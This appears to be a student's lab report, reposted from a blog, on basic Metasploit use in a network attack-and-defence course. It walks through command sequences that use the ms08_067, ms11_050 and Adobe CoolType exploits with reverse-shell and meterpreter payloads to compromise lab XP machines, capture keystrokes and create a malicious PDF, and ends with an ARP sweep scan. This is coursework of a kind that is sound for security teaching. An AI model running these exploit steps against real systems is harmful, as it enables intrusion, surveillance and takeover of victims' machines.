zoukankan      html  css  js  c++  java
  • 20145222黄亚奇《网络对抗》MSF基础应用

    实践目标

    • 掌握metasploit的基本应用方式。

    • 具体需要完成(1)ms08_067;(2)ms11_050;(3)Adobe(4)成功应用任何一个辅助模块。

    实验内容

    • 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路
    • 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以ms08_067为例
    • 针对浏览器的攻击,以ms11_050为例,针对IE7的漏洞攻击
    • 针对客户端的攻击,即对具体应用上的攻击,以对Adobe阅读器的漏洞攻击为例
    • 同样尝试针对具体的应用攻击,这里是针对word的ms10_087
    • 尝试运用辅助模块,这里使用auxiliary/scanner/portscan/tcp模块,扫描目标系统的tcp端口

    基础问题回答

    · 解释exploit,payload,encode.是什么:
    exploit就是负责负载有用代码的交通工具,先通过exploit把路打通、打开以后,好让有用代码能够作用与目的地;
    payload就是有具体功能作用的代码,能够完成具体交代的任务,即exploit所负载的东西;
    encode就是对payload进行再编译,避免打上“危险物品切勿签收”的标签,让被攻击者一下子就知道这是病毒;

    实验总结与体会

     这几次实验每次都用到了MSF这个工具平台来操作,这次通过对MSF应用的实验,不仅仅是对MSF这个工具平台有了更清楚的认识,也渐渐地会运用这个工具来实现一些基本的攻击,同时也了解到了漏洞攻击有着非常多的攻击方法(花样太多,电脑有危险!)网络攻防,要想学会防守得先了解如何攻击,特别是自己的电脑存在着漏洞的情况下,作为一名信息安全专业的学生更加要多多注意留心。

    实践过程记录

    一、使用ms08_067漏洞攻击

    ping通:

    1、在kali终端中开启msfconsole。

    2、输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:

    3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

    4、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

    5、依次输入命令 set LHOST "kali Ip"  set RHOST "Win xp Ip" 并使用命令 show options 查看payload状态。

    6、输入命令exploit开始攻击,并在kali上执行ipconfig/all得到如下图所示:

    二、IE浏览器渗透攻击——MS11050安全漏洞

    1、在kali终端中开启msfconsole。

    2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。

    3、设置对应的载荷set payload windows/meterpreter/reverse_tcp

    4、设置相关信息

    set LHOST ‘kali Ip’
    set LPORT  XXXX
    set URIPATH XXX

    5、exploit,如下图所示,有靶机需要访问的ip地址:

    6、在靶机IE上输入网址,kali中显示一个 session 1 已经创建。

    7、输入命令sessions -i 1,开始连接

    8、已经攻击成功了,开始按键抓取

    • 或者获取shell

    三、Adobe阅读器渗透攻击

    1、和前面一样,进入msfconsole后,先选择adobe_cooltype_sing模块,选择参数生成PDF文件:

    1)在kali终端中开启msfconsole。

    2)输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

    3)使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

    4)输入命令

    set FILENAME xxx.pdf 
    set LHOST "KALI Ip"
    set LPORT xxxx   

    2、输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

    3、使用命令back退出当前模块,并使用 use exploit/multi/handler 新建一个监听模块。使用 set payload windows/meterpreter/reverse_tcp 建立一个反向连接。并且

    输入命令 set LPORT 2222 和攻击模块里的数据设置是一样的。

    4、exploit开始攻击,在xp中打开pdf。观察msfconsole,已可以控制被攻击主机,获取系统基本信息,获取shell

    5、输入shell,查看xp靶机信息。

    6、在靶机xp中使用命令netstat -an,看本地tcp连接。

    四、使用ms10_087漏洞攻击

    1、手动创建一个msf所需的数据库

    service postgresql start
    msfdb start
    

    2、开启msfconsole

    3、输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块

    4、使用命令,设置

    set interface eth0
    set RHOSTS 172.30.1.0/21
    set threads 2
    

    6、命令run开启扫描,结果可以看到除了自己主机的IP意外,还有两个其他ip。

    7、可以ping通,开启nmap扫描,可以看见开启的端口号,以及目标机的操作系统。

  • 相关阅读:
    原创【cocos2d-x】CCMenuItemToggle 在lua中的使用
    SQL Server之LEFT JOIN、RIGHT LOIN、INNER JOIN的区别
    VS的IISExpress配置通过IP访问程序
    SQLServer执行大脚本文件时,提示“无法执行脚本没有足够的内存继续执行程序 (mscorlib)”
    jqGrid中multiselect: true 操作checkbox
    display:table的几个用法(元素平分宽度,垂直居中)
    ASP.NET中 前后台方法的相互调用
    AspxGridView使用手记
    大量文本框非空判断,如何提高灵活性?
    Mysql安装、配置、优化
  • 原文地址:https://www.cnblogs.com/huangyaqi/p/6719984.html
Copyright © 2011-2022 走看看